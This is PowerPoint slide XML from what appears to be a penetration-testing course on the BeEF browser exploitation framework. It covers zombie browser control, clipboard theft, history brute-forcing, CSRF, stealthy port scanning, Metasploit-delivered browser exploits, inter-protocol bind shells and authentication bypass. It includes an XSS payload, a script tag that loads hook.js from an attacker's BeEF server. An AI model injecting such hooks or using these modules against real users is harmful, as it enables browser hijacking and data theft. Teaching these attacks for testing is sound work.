        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The various panels control the victim browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Zombies are listed as offline or online</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If offline, commands will be sent when the browser reconnects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Module descriptions are to the right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also where the module config appears</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>More menu options can be accessed by right clicking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The color of the icon determines if the module runs on the victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13414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0738" y="1132389"/>
            <a:ext cx="4483100" cy="321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4149" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="4753978"/>
            <a:ext cx="3124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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Works on the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Works but may be visible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Not Confirmed to work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Doesn't work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13415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74489" y="4649203"/>
            <a:ext cx="457200" cy="135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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Zombie Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="1371600"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses hook.js to hook the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;script src=http://beefserver:3000/hook.js&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Inject this script via an XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is the payload of the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This file connects the victim to  the BeEF controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The BeEF controller changes the JS based on commands issued</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We then use the various modules to control the zombie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Or redirect the victim to a Metasploit server</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204085" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669560" y="1753850"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF contains a number of modules to modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These modules provide the various attacks against the zombie machines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Multiple modules available:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Clipboard Stealing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>History Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Browser Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Inter-Protocol Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136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62330"/>
            <a:ext cx="1404938" cy="96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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Clipboard Theft</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Module used to grab the victims clipboard contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sends it to the BeEF server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Abuses a feature in Internet Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Only works on victims running IE before version 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Without prompting the user</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> History Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As with AttackAPI, this module retrieves browser history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses brute force techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We must provide a list to BeEF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It has a few sites by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Allows us to target users and sites</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Request Initiation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Module to send HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Victim browser makes the request as directed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Excellent for CSRF attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This module does not return page content to the attacker</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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port scan a network through the zombies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Quickly map a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Distributed across zombies to lower risk of detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very stealthy with enough zombies</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a:xfrm>
            <a:off x="-381000" y="156150"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Browser Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141315" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1666410"/>
            <a:ext cx="5867400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF now supports integrating with Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This requires a running copy of Metasploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reachable by the BeEF server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF will inject an iframe into the victim to deliver a browser exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also supports AutoPWN which is not recommended</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14131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8210" y="564630"/>
            <a:ext cx="2590800" cy="586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4085" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Inter-protocol Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many protocols are forgiving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>They will ignore "junk"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Request headers are often considered junk!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF allows for exploitation across protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>From a hooked browser running attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s scripts, we can direct HTTP requests to target servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Payload of HTTP request is a service-side exploit, to be delivered from hooked browser to target server (possibly on intranet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF injects a BindShell as an exploit payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pen tester interacts with the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Through BeEF controller application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Controller runs on pen tester's server</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authentication Bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1618940"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This flaw allows us to access restricted content without authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Provides access to various items based on the flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Access reserved functionality such as administrative consoles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Access to accounts other than our own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploits the lack of authentication verification within the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We gain access to more of the application</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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204085" y="77450"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF Protocol</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
